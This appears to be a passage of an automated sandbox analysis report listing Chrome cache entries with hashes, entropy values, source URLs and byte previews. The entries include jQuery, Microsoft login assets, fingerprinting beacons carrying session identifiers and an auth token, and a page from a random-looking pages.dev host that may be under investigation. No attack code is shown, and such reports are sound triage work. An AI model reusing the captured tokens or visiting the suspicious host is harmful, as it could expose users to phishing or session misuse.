SHA1:	9DEA24F4D54AF8B078C0436F12E1C776E743C252
SHA-256:	024A3C378C79D1121EDB62D647F63747F71DFAD33487869FA4C26C37F74839F1
SHA-512:	5F2BF1A3ADCB6DBFED9833E1B2724F922FBCB8B452AD1AA040FC1279424A87DBBC345FFFA29CAFE026BC77BEAAF91A43BB7129CA632AD953EAA19A97FC47D0B3
Malicious:	false
Reputation:	low
Preview:	2f1aceab9d3b8b76414197305cf9581d19253b7d778804cce31156400f6601469838ae51af39003d07b47993eef35a29e01219b6ddaccc6518614193fb0fc1b63a75df2b7100fd6b2838ef2557904e2fd0d698157cc5618e82aee5004d070341077ba558b936cb6c02a2a8bf78ffd2de255ce9228c9f31a9ef9b

Chrome Cache Entry: 138

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 100 x 100
Category:	dropped
Size (bytes):	68682
Entropy (8bit):	7.902659665512124
Encrypted:	false
SSDEEP:	1536:tLKlVYQDckxy/+39MtKNAuavoCEjZ1+q0IfrFs5tfoFkkMMECVgQqYy75:t2gQ9U+T+r755oGkVbVs7
MD5:	9643BA737D9091D6252BF5812310AF61
SHA1:	4714C1BE53C997289819B17C91E3A4FD0030A42C
SHA-256:	3C21E22B282A0A65B6B07871D20856FB062DA3B5E1D481564379249BC2071235
SHA-512:	0C48221C7C8F4B30B921BAE1B4FC2843CBC01C82BE62DBDE4993E0068B3A5C782D73291EA53CF5586DF3D428736BB2CC382D37574EEBE131AB6B1611038C667E
Malicious:	false
Reputation:	low
Preview:	GIF89ad.d..........DBD...$"$dbd............TRT...424trt............LJL...,,ljl............\Z\...<:<\|z\|............DFD...$&$dfd............TVT...464tvt............LNL...,.,lnl............\^\...<><\|~\|......!..NETSCAPE2.0.....!.....>.,....d.d....@..#,....q.\..M..H.Z..+..ym...z...J..,%'.c..iu...7.....drJs..HU{S..wqr..P~jn.K.HO.....p\.N~[.N}.f.f..o...vp.TSM............Y...b.G..Z..t...e.w..i..{.......t.a..L]..vc.H..&.X..m...Bu..............D..5..&..oRn.P....h.>..'.d.]i.\.0........IeDRsr.z.H...;s.<9..M..,...C.PB..-{g.d+.,..b.SbN.11l.G.kJ..&....&.[....b.F.5>P..l..r....U.O....}.!&..SY...n....Mf..Q.dN..).&.yl...WU.CH..DEroa9)b.0.u6B.._.s&.D^..#f..GL.7.?B...\..?..d0Y.W.x..........,.w.C."....s.+.G)5..~D`.OrG..@L%.S.(....E.F.....w.e.dX.Zf.<..p.`r..........N...(........ph..(0....s.%/\0..+.......R.q..+)A..m.=.....0....G.....C.'`S.......#d9..#. `I7.n8d...h...oj.%..xf..6..&.<x.#V.ng.{..0.Np.e.<.......9...W........5...........h.o.w+%3H.(.;.)a.E.0..Z.p.j..1.\.........u..bGQ

Chrome Cache Entry: 139

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	6
Entropy (8bit):	2.584962500721156
Encrypted:	false
SSDEEP:	3:fCu:au
MD5:	AAAB7A355103063D9EEB4824A3A6B374
SHA1:	E51555F02C32321F3E48F07A0FA5AF46DF835BFC
SHA-256:	79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
SHA-512:	D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
Malicious:	false
Reputation:	low
URL:	https://fpt.live.com/Images/Clear.PNG?ctx=jscb1.0&session_id=b58882512b7c40d78c42f4d88f1affac&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&esi=YnVhPU1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTcuMC4wLjAgU2FmYXJpLzUzNy4zNiZvcz1XaW4zMiZscHJvYz00Jm9sPXRydWUmcnR0PTIwMCZjaHJtPXRydWUmcHJvc3ViPTIwMDMwMTA3JmV2YWw9MzMmYXBwdj01LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2JmxzPXRydWUmZG09OCZtdHA9MCZuYz03NCZwcj0xJnNyPTEyODB4MTAyNCZzY2Q9MjQmYXNyPTEyODB4OTg0JnR6PS0zMDAmZHN0PTYwJnR6bz0tMjQwJmJsPWVuLVVTJm10aD0yN2Y1MWQzMTQ5ZTZiZjIwOWI2NmJkMzg3YjBhZjNjNCZtdG49MiZwbj01JnBoPWYzYWMyMmFjNTljNmRjYjg3NDEwOWQwOTNjNTI1NWU4JnA9cGx1Z2luX2ZsYXNoJTNEZmFsc2UlMjZwbHVnaW5fd2luZG93c19tZWRpYV9wbGF5ZXIlM0RmYWxzZSUyNnBsdWdpbl9hZG9iZV9hY3JvYmF0JTNEZmFsc2UlMjZwbHVnaW5fc2lsdmVybGlnaHQlM0RmYWxzZSUyNnBsdWdpbl9xdWlja3RpbWUlM0RmYWxzZSUyNnBsdWdpbl9zaG9ja3dhdmUlM0RmYWxzZSUyNnBsdWdpbl9yZWFscGxheWVyJTNEZmFsc2UlMjZwbHVnaW5fdmxjX3BsYXllciUzRGZhbHNlJTI2cGx1Z2luX2RldmFsdnIlM0RmYWxzZSUyNnBsdWdpbl9zdmdfdmlld2VyJTNEZmFsc2UlMjZwbHVnaW5famF2YSUzRGZhbHNlJmZoPTJhMjk4NDlhZjA3ZGQxNjFkZGM3MzA0MGJlMjVmM2YwJmZuPTExMiZsaD1odHRwcyUzQSUyRiUyRmZwdC5saXZlLmNvbSUyRiUzRnNlc3Npb25faWQlM0RiNTg4ODI1MTJiN2M0MGQ3OGM0MmY0ZDg4ZjFhZmZhYyUyNkN1c3RvbWVySWQlM0QzM2UwMTkyMS00ZDY0LTRmOGMtYTA1NS01YmRhZmZkNWUzM2QlMjZQYWdlSWQlM0RTVSZkcj1odHRwcyUzQSUyRiUyRnNpZ251cC5saXZlLmNvbSUyRiZ3PThEQ0NBMEZGMTIzRTZFRiZpZD1iMzA1MjUxMC05MGRkLTUyY2ItNzU4MC05YzRlZDVjYjM2ZmEmYT0mYz1iMGVhZGI5MzQxNjZiNjk2MDdiODI1OTIyMzM2MTc2ZA==&eci=eyJ1dmRyIjoiR29vZ2xlIEluYy4gKEdvb2dsZSkiLCJ1cmRyIjoiQU5HTEUgKEdvb2dsZSwgVnVsa2FuIDEuMy4wIChTd2lmdFNoYWRlciBEZXZpY2UgKFN1Ynplcm8pICgweDAwMDBDMERFKSksIFN3aWZ0U2hhZGVyIGRyaXZlcikiLCJ2ZHIiOiJXZWJLaXQiLCJyZHIiOiJXZWJLaXQgV2ViR0wiLCJpZHVoIjoiMTViNmNhNDcyNjliZTQyODc1Njg1MDY5MzdlOTkxN2MifQ==&PageId=SU&u1=&u3=10.0.0&u4=x86&u5=64&u2=(Google%20Chrome%2C117.0.5938.134)%2C(Not%3BA%3DBrand%2C8.0.0.0)%2C(Chromium%2C117.0.5938.134)
Preview:	dfp:OK

Chrome Cache Entry: 140

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	dropped
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 141

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	31
Entropy (8bit):	3.873235826376328
Encrypted:	false
SSDEEP:	3:YA8rQaC:YAoQaC
MD5:	5FC018D9E6C56911BBC8DC5DDCD0C768
SHA1:	70979F57A85D527ED8ABCBF02CFF44640C58BDE6
SHA-256:	2E6D78A4AE644F3B60AFD3C33E66539FF6C5F6A8ED6ABC40A3AF06AC020EC020
SHA-512:	1E3B86274B3590E28366F2D2DE86A1844058E213BD225AAA05D992CA70523F65D2BD543F9F762A805A2C4D5961AA34F5A19EBE70E135939C9CD3C63F6B5F5524
Malicious:	false
Reputation:	low
Preview:	{"error":"Method Not Allowed"}.

Chrome Cache Entry: 142

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (23170), with CRLF line terminators
Category:	downloaded
Size (bytes):	23634
Entropy (8bit):	5.763266270642432
Encrypted:	false
SSDEEP:	384:HDEbHIEsQdsQvZxyF1Aw8B7Nv0edjuDNaFTLLb2M/zvyMEZWpn:jOH9yF1IBBdq5yF/2dE
MD5:	4EC07C4FD67495D5DB706DC6310444C3
SHA1:	4B8490C088530B6E2EE7AF7A4C6BCA0D8A8232A3
SHA-256:	70C5FBF7EF06DFAB100A6CD0853499FEEB2FBF6FC3B61A671B36A2B9188841BD
SHA-512:	D738F00C20CA765803B14D4A8887A6E75C7D3116970170B355F90527196C7727231E0780708FCAC1FF24047C03986037DAC442038903C1F4E6505249324ACA05
Malicious:	false
Reputation:	low
URL:	https://fpt.live.com/?session_id=b58882512b7c40d78c42f4d88f1affac&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SU
Preview:	<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>.. <script>var localTarget='https://fpt.live.com/',target='https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&',txnId='b58882512b7c40d78c42f4d88f1affac',ticks='8DCCA0FF123E6EF',rid='b3052510-90dd-52cb-7580-9c4ed5cb36fa',authKey='taBcrIH61PuCVH7eNCyH0J9Fjk1kZEyRnBbpUW3FKs%252bPBIIe5UPfX%252fdCN4xorunpDaUx8d6T2Sy5nsqmpG4qpaE64KjG8k5m55Tu7wCV3pS5XDm0jMpOmbcjUStMLy6OIPAsPYiVynnbiQCj%252fvMiJ8nOarRWT2n%252bbtQrqdEOWamE25rSJSI8Dg0gtfk3tlrYkFvuklxY4xcTBNkuVsgQ7C6rm2DLAlCRgvyWUkX8e12dcnJ6j91Lts1wBrbikiB6QMyQdBf4L5q80Qh6lBclSq7ANW%252fgUyoinMrNK%252bqYEzCfKyzgbAJAKuYWGLRLrxEZ',cid='33e01921-4d64-4f8c-a055-5bdaffd5e33d',assessment='',waitresponse=true,bbwait=false,commonquery='&PageId=SU',lsInfo=true,splitFonts=false,noFonts=false,UCH=true,PTO=100,rticks=1725144899875,ipv6Url='',txnKey='session_id',ridKey='id',lskey='MUID';(function(){function w(){var i=0,n;return t&&t.length&&(i=t.length),n="",wind

Chrome Cache Entry: 143

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	89476
Entropy (8bit):	5.2896589255084425
Encrypted:	false
SSDEEP:	1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
MD5:	DC5E7F18C8D36AC1D3D4753A87C98D0A
SHA1:	C8E1C8B386DC5B7A9184C763C88D19A346EB3342
SHA-256:	F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
SHA-512:	6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Preview:	/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Chrome Cache Entry: 144

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 901881
Category:	downloaded
Size (bytes):	231091
Entropy (8bit):	7.998390937544825
Encrypted:	true
SSDEEP:	6144:Z4w6J4OiKySVPhKwGX9rZUKsSqNNZPRNSBX:awkViKySV5KXX9mBS0NZZYX
MD5:	05A20B73D23C52A09386F3222045E62D
SHA1:	0991D7FD9A84F82DD39FBE065C0070D3196F497C
SHA-256:	BAB90DCF5FE87AB6DDEED7339CC36967BA7188CE3E01CCF7C65D9369056C41A4
SHA-512:	F93017FD9AC4A684D5BBC5BD44992D9687DDA5011050B9F7AA1718EA99F91E5BB7031854461E48316D10D095347E5953F376949EFCC57348980D792AD745BFCE
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/5/js/signup-fabric_en_hjnWUmfm-pOUxYXWMUv1Yw2.js
Preview:	...........iw.8.(.....n....dg...M....l.'.N.}}h...H...8.....+E9.g.g.{&...A.K..T.j..........r#.Fy1K.4.6.S.@V)..:...QrV..S...,./....::hW_......6G.l.....yRlHQ.L.".i\|..nw.ndJ....+..j.."..](..<..L..p?...zw9.e.....\{..C9J...M...9-....U2..cY=...."=....a...."/.3.../iF.9d..T.%.:S.Ne6.&.h.W...t....../f2.J~H.K.,..n......z6O....n..4.Z..ll...^..Z..F.N.r.CV?.....=.......r...rt........:...:..8!$(..g..A.Z.Lb%....B.....t>VZ.y....Y>-...SY..t^..:%..Yz=.c.o..'...</.26 ..!{x....bt6nm.......,.x.da/...7.x.........&......$N.......=X.........~.PL.No.(i3....'..Y..ONz..f......[[.%f[[3JL........x.d.,.U..U..:....:0.......),..Kq.o..}oI....N..W..t~+...Y..j....h..,....m.T.J.e..RB..._..b.u.ql.7u.Nz_.-2..li.......`.`O+..1h.2..S.+..F.:...l.M...t.6..B.".;u...T.g.t....@..[-.Q........b..P..<...TLm.2...K%.e6p:....]S.`Q..S.....m.#Ur..w#x....CUl.V.M.N.i.....Tv.....8k,2M.^."..ec..i>..Z...a..a.8...{_\4.,d9.33k...y...,U..vU..u..]N.# ~..bk+[L...$oUl..^y..f.;..).<R...a..?..g.?

Chrome Cache Entry: 145

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 146

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17527), with CRLF line terminators
Category:	downloaded
Size (bytes):	19183
Entropy (8bit):	6.1371082440115075
Encrypted:	false
SSDEEP:	384:eOPZ0j1RQTqbGOe4hacHGF6Q8QqoL11VvpoKw1oPjF12NQKLOKx2WSAI2v:ehjQTqbG2dHGsp+TVvyjIBKL/FcE
MD5:	C69BC69003105B2B051AB2D11E59C2C7
SHA1:	DF19B5D9568E24C9C3FD74A8E76B6AEFFB9C49BF
SHA-256:	9808503F6D4D8C80E656A3AB96DA9D57AA91DBA35AC51F77F028DBC4760ED8BC
SHA-512:	EDFCC7915314277B7187ECB1539233ECD6FF24A963CE37C93D571092C809994F4C1FA6D228D4495DD9FC2BD67013D71FC8C2251839EA3FA278DB0EB1D5339A7B
Malicious:	false
Reputation:	low
URL:	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/
Preview:	<div id="hbg" style="width: 100px;margin: 0 auto; 0 auto;visibility:hidden;">..<img style="width: 100%;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAAC5CAYAAABtJnD6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAADLFSURBVHhe7X0JlF1Heebf6l3dUmtt7bssW5IXyRteRmCMIdgmDNsMYJyQnMQBkwQSkjOcMRmGsDg5IROWIQkMMIlDMJCFkBBIYMCGAMYLtmXZ8ibv2ltLt9Qt9d5vvq9u1e269ered+97vbx+fb/T1bfqr7+2W/Xdqr/u8iRHjhzxqNPH2Yd33bVRCoVd8G2Da4crUJyjJnAabo/U1f2HfP7aQ4GoPMw+grzrB2tlrPBR+N4CN1fJctQqekCSO2TOnI/I5155UssyYXYR5F13vVLGxr4GX2cgyDFLsA/uzfKF6x4NgukxewjyGz+4DEuqu+DjcirH7MMBzCS7sOR6QYdTYY4+1jZu/WELyPEF+HJyzF6sxhj4c+1PjdlBkNHRt+P/RUEgx6xFoXADVhKv0qFUmB0EKRRIkBw5iLfpYyrUPkHeffdC/D8/COSY9SgULpXfvz/1uJ8NM0gH3PzAmyOHLJbTvW3aXxK1T5C6utl7MzSHD3WYRVKPidlhg+TIUSZyguTIkYCcIDlyJCAnSI4cCcgJkiNHAnKC5MiRgJwgOXIkICdIjhwJyAmSI0cCcoLkyJGAnCA5ciQgJ0iOHAnICZIjRwJyguTIkYCcIDlyJCAnSI4cCaj9l4luvXuDjIw8KgVJ/RZZ1aAwAz/2OKaP1YsDcNvlr17Dry+WRO0T5L0/A0FG+cGwmUWQlnqRJriZxBGuR9oaq31UHUD9tsttO3OCKNz2xAYp1IEgdTOHIGNg

Chrome Cache Entry: 147

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65402)
Category:	dropped
Size (bytes):	155101
Entropy (8bit):	5.673242491471087
Encrypted:	false
SSDEEP:	3072:B4bBfYPY3LKdHJUksyKILwQ5IYxJwJhTDrdZKlf0H0:B4RkY3kJBk2JafrdZKlfH
MD5:	3403221E2A71871CE02AAA367B5C4748
SHA1:	4C831711DDEF2D4676147434C11D6337735EAC03
SHA-256:	6099149817D46ECA1784C18660E807F192CB369FCE2FD571A944289FF3194139
SHA-512:	EB6EF2F02B89D39E6867E67AFB6B3426F4DCFAA07F7D67EA7FE6DF1E7E7F3CE6DA0BDD61FD416BDD7AD86C09E10285A3D5D14DFCC647C13FED96BE780BA71F10
Malicious:	false
Reputation:	low
Preview:	// @license Copyright (C) 2014-2024 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXzC5j78di",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e\|\|e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r\|\|"Set"===r?Array.from(t):"Arguments"===r\|\|/^(?:Ui\|I)nt(?:8\|16\|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)\|\|function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]\|\|null!=t["@@iterator"])return Array.from(t)}(t)\|\|

Chrome Cache Entry: 148

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89795
Entropy (8bit):	5.290870198529059
Encrypted:	false
SSDEEP:	1536:IjjxXUHunxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBqUsuy8WnKdXwhLQvg:IeeIygP3fulzhsz8jlvaDioQ47GKH
MD5:	641DD14370106E992D352166F5A07E99
SHA1:	EDA46747C71D38A880BEE44F9A439C3858BB8F99
SHA-256:	A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
SHA-512:	A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
Malicious:	false
Reputation:	low
Preview:	/! jQuery v3.6.4 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 149

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 900
Category:	dropped
Size (bytes):	252
Entropy (8bit):	7.057986237150363
Encrypted:	false
SSDEEP:	6:Xth1WIxjFLw0cb88da94jE0CadKSPfN8IC6a8r0ADAgvw9xwi:Xf1WMlcb5a92EGZa6JmUUxh
MD5:	19AA49E6F345811CEBE895003C8FCFC7
SHA1:	48D93BEDEFFE842A3DFB5D3036D14178D97115F9
SHA-256:	F61DC276446B263FC29B1A8CE20D8BFD2C028F4603356F795687B942E3B4969F
SHA-512:	6A2E4E29D0FDBFD0E671A88CB6411AA7401524C3DDF903AB8E766B4CD66C9C31E0D175592920D29D3CF0CD67D6FA6763F6A0D4A5286EEC48F77028A36054E642
Malicious:	false
Reputation:	low
Preview:	...........S.. ...q.cl.&...}.....1..Uj?.jR..&......8..h.G....jl..n8.!.P...+....Fa8x[c.0...[?..........'n....kZ.:...w..z..5..&dA.+..1h2".!..R1(.t..SJ.N+......VV._...y.D_..3"4...e;. ]RA...r..VR-..I..DO.9Y...a{A\&.xr{.H.K\...f.?.7&}..........

Chrome Cache Entry: 150

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	dropped
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 151

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89795
Entropy (8bit):	5.290870198529059
Encrypted:	false
SSDEEP:	1536:IjjxXUHunxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBqUsuy8WnKdXwhLQvg:IeeIygP3fulzhsz8jlvaDioQ47GKH
MD5:	641DD14370106E992D352166F5A07E99
SHA1:	EDA46747C71D38A880BEE44F9A439C3858BB8F99
SHA-256:	A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
SHA-512:	A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
